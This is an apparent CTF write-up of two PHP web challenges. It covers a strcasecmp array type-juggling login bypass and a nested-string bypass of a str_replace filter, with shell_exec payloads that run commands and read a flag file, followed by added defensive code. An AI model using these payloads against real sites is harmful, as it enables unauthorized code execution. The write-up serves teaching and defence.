# [Killer Queen CTF 2021](https://ctftime.org/event/1482)

###### tags: `ctf`

# Web

### `Just Not My Type`

![](https://i.imgur.com/7mPR9DM.jpg)

- Challenge description => a simple login page

![](https://i.imgur.com/9jZMWng.jpg)

- Source code:

```php=
<h1>I just don't think we're compatible</h1>
<?php
$FLAG = "shhhh you don't get to see this locally";
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $password = $_POST["password"];
    if (strcasecmp($password, $FLAG) == 0) {
        echo $FLAG;
    } else {
        echo "That's the wrong password!";
    }
}
?>
<form method="POST">
    Password <input type="password" name="password">
    <input type="submit">
</form>
```

- Vulnerability:
  - It turns out that `strcasecmp` in PHP produces a result that compares equal to 0 (as if the values were the same), so the check is bypassed, when the parameter is an array.
  - The reason is that `strcasecmp` cannot deal with arrays. If a user passes `password[]=123456`, it returns `NULL`, and the loose comparison of `NULL` with `0` succeeds (`NULL == 0 ==> true`).

![](https://i.imgur.com/RnTTaaP.jpg)

- Burp Suite is used to send the payload

![](https://i.imgur.com/btBqIgP.jpg)

- We can even send the variable without assigning it a value => just send `password[]`

![](https://i.imgur.com/fG7mUZo.jpg)

- Got the flag: `flag{no_way!_i_took_the_flag_out_of_the_source_before_giving_it_to_you_how_is_this_possible}`

## Resources for first challenge:

- [CSAW-2012-Web](http://int03.blogspot.com/2012/10/csaw-2012-ctf-web-600-write-up.html)
- [PHP Vulnerable functions](https://www.chabug.org/ctf/417.html)
- [NULL == 0 return True in PHP](https://stackoverflow.com/a/8236390/12349124)

# Web

### `PHat Pottomed Girls`

- Challenge description

![](https://i.imgur.com/wLeoz2M.jpg)

- Challenge source code

```php=
<?php
session_start();

function generateRandomString($length = 15) {
    $characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
    $charactersLength = strlen($characters);
    $randomString = '';
    for ($i = 0; $i < $length; $i++) {
        $randomString .= $characters[rand(0, $charactersLength - 1)];
    }
    return $randomString;
}

function filter($originalstring) {
    $notetoadd = str_replace("<?php", "", $originalstring);
    $notetoadd = str_replace("?>", "", $notetoadd);
    $notetoadd = str_replace("<?", "", $notetoadd);
    $notetoadd = str_replace("flag", "", $notetoadd);
    $notetoadd = str_replace("fopen", "", $notetoadd);
    $notetoadd = str_replace("fread", "", $notetoadd);
    $notetoadd = str_replace("file_get_contents", "", $notetoadd);
    $notetoadd = str_replace("fgets", "", $notetoadd);
    $notetoadd = str_replace("cat", "", $notetoadd);
    $notetoadd = str_replace("strings", "", $notetoadd);
    $notetoadd = str_replace("less", "", $notetoadd);
    $notetoadd = str_replace("more", "", $notetoadd);
    $notetoadd = str_replace("head", "", $notetoadd);
    $notetoadd = str_replace("tail", "", $notetoadd);
    $notetoadd = str_replace("dd", "", $notetoadd);
    $notetoadd = str_replace("cut", "", $notetoadd);
    $notetoadd = str_replace("grep", "", $notetoadd);
    $notetoadd = str_replace("tac", "", $notetoadd);
    $notetoadd = str_replace("awk", "", $notetoadd);
    $notetoadd = str_replace("sed", "", $notetoadd);
    $notetoadd = str_replace("read", "", $notetoadd);
    $notetoadd = str_replace("system", "", $notetoadd);
    return $notetoadd;
}

if (isset($_POST["notewrite"])) {
    $newnote = $_POST["notewrite"];
    //3rd times the charm and I've learned my lesson. Now I'll make sure to filter more than once :)
    $notetoadd = filter($newnote);
    $notetoadd = filter($notetoadd);
    $notetoadd = filter($notetoadd);
    $filename = generateRandomString();
    array_push($_SESSION["notes"], "$filename.php");
    file_put_contents("$filename.php", $notetoadd);
    header("location:index.php");
}
?>
```

- Challenge entry

![](https://i.imgur.com/7K9nO5Y.png)

- Analysis => the vulnerability is in `str_replace()`:
  - Although there is a filter for specific commands, we can easily bypass `str_replace()` by reconstructing the string one word at a time, which leads to command injection (e.g. if `cat` is filtered once and we construct the word `c` `cat` `a` `cat` `t`, then once `cat` is filtered out, `cat` remains, and we can use this to construct our payload).

- Payload:
  - `<<<<???? phpinfo(); ????>>>>`
- Result:

![](https://i.imgur.com/Wf8JUSK.jpg)

- Payload:
  - `<<<<???? echo shell_exec('whoami'); ????>>>>`
- Result:

![](https://i.imgur.com/TMPaf5Y.jpg)

- Payload:
  - `<<<<???? echo shell_exec('ls -lart'); ????>>>>`
- Result:

![](https://i.imgur.com/S7TboLk.jpg)

- Payload:
  - `<<<<???? echo shell_exec('ccccatatatat /fffflaglaglaglag.php'); ????>>>>`
- Result: flag: `flag{wait_but_i_fixed_it_after_my_last_two_blunders_i_even_filtered_three_times_:(((}`

![](https://i.imgur.com/NWY85w6.jpg)

## Resources for challenge 2

- [PHP execute commands](https://www.php.net/manual/en/function.shell-exec.php)
- [str_replace() tricks](https://github.com/m3ssap0/CTF-Writeups/blob/master/35C3%20Junior%20CTF/flags/README.md)
- [str_replace() tricks 2](https://jbz.team/turinctf2017/turinctf)

# Result

- I solved two challenges, and all of us solved 9 challenges

![](https://i.imgur.com/k7s83OX.png)
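Looking back at the first challenge (`Just Not My Type`), the login check fails because `$_POST["password"]` can be an array and the loose `== 0` then treats `strcasecmp()`'s `NULL` as a match. The block below is an added example of how the same check looks when it rejects non-string input and compares against a hash; it is not the challenge's code, and the stored secret and the simulated request bodies are constructed for the demo.

```php
<?php
declare(strict_types=1);

// Added example (not the challenge's code): the login check written so that a
// non-string "password" parameter cannot pass it.
// Assumption: the secret is stored as a password_hash() digest instead of as
// the flag itself; every value below is constructed for this demo.

function check_password($input, string $storedHash): bool
{
    // $_POST["password"] is an array when the client sends password[]=... .
    // strcasecmp() on an array yields NULL (PHP 7, with a warning) or throws a
    // TypeError (PHP 8); the original "== 0" then treated NULL as a match.
    // Rejecting every non-string up front closes that path on both versions.
    if (!is_string($input)) {
        return false;
    }
    // password_verify() does a constant-time comparison against the stored
    // digest, so the secret is never handed to strcasecmp() or == at all.
    return password_verify($input, $storedHash);
}

// Constructed demo secret.
$storedHash = password_hash('correct horse battery staple', PASSWORD_DEFAULT);

// Simulated request bodies: the legitimate form post, a wrong guess, the
// array-style parameter from the write-up, the bare password[] variant, and a
// request with no parameter at all.
$requests = [
    'normal string'     => ['password' => 'correct horse battery staple'],
    'wrong string'      => ['password' => 'guess'],
    'password[]=123456' => ['password' => ['123456']],
    'password[]'        => ['password' => ['']],
    'parameter missing' => [],
];

foreach ($requests as $label => $post) {
    $ok = check_password($post['password'] ?? null, $storedHash);
    printf("%-18s => %s\n", $label, $ok ? 'ACCEPTED' : 'rejected');
}
```

Only the first request is accepted. A strict `=== 0` in the original would already have stopped the `NULL` case, since `NULL === 0` is false, but the `is_string()` guard is what actually documents the assumption, and on PHP 8 it also prevents the `TypeError` that an array argument would otherwise raise.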
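For the second challenge (`PHat Pottomed Girls`), the point worth keeping is that a stripping deny-list is not idempotent: each pass removes one level of nesting, so a fixed number of passes can always be out-nested by one more level. The block below is an added example, not the challenge's code; it reuses a subset of the challenge's word list and the final payload from the write-up to show the three-pass result next to two alternatives (filtering to a fixed point, and rejecting the note outright).

```php
<?php
declare(strict_types=1);

// Added example (not the challenge's code): why the three-pass str_replace()
// filter fails, and what a reviewer would ask for instead.
// Assumption: the deny-list below is a subset of the challenge's list; the
// payload is the final one from the write-up.

const DENIED = ['<?php', '?>', '<?', 'flag', 'cat', 'system'];

// Challenge-style filter: one str_replace() pass per denied word.
function strip_once(string $s): string
{
    foreach (DENIED as $word) {
        $s = str_replace($word, '', $s);
    }
    return $s;
}

// The challenge applied the filter a fixed number of times (three).
function strip_n_times(string $s, int $passes): string
{
    for ($i = 0; $i < $passes; $i++) {
        $s = strip_once($s);
    }
    return $s;
}

// Keep filtering until the output stops changing. Still a deny-list (case,
// encodings and synonyms are not covered), but nesting no longer helps.
function strip_to_fixed_point(string $s, int $maxRounds = 50): string
{
    for ($i = 0; $i < $maxRounds; $i++) {
        $next = strip_once($s);
        if ($next === $s) {
            return $s;
        }
        $s = $next;
    }
    throw new RuntimeException('filter did not converge');
}

// Reject instead of rewrite: a note containing a denied word is refused as a
// whole, so there is nothing left for a later pass to reassemble.
function accept_note(string $s): bool
{
    foreach (DENIED as $word) {
        if (stripos($s, $word) !== false) {
            return false;
        }
    }
    return true;
}

$payload = "<<<<???? echo shell_exec('ccccatatatat /fffflaglaglaglag.php'); ????>>>>";

echo "after 3 passes : ", strip_n_times($payload, 3), "\n";
echo "at fixed point : ", strip_to_fixed_point($payload), "\n";
echo "accept_note    : ", accept_note($payload) ? 'yes' : 'no', "\n";
```

The first line of output is exactly the executable note the write-up obtained, because each of `<<<<????`, `ccccatatatat` and `fffflaglaglaglag` is nested three deep. Neither alternative fixes the root cause on its own, though: the real defect is `file_put_contents("$filename.php", ...)` writing user-controlled content as an executable file inside the web root. Storing notes with a non-executable extension, or outside the document root and serving them as plain text, removes the code-execution consequence regardless of how good the word filter is.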